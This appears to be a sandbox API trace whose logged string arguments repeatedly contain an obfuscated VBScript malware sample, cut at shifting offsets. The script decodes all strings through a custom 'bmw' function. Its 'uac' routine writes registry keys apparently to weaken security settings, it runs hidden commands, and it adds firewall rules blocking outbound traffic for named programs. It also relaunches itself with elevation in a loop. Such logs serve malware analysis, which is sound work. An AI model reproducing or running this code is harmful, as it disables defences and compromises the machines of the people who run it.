bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0223.008] wcsncmp (_String1="ove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0223.008] wcsncmp (_String1="ve rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 105 [0223.008] wcsncmp (_String1="e rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.008] wcsncmp (_String1=" rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0223.009] wcsncmp (_String1="rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite 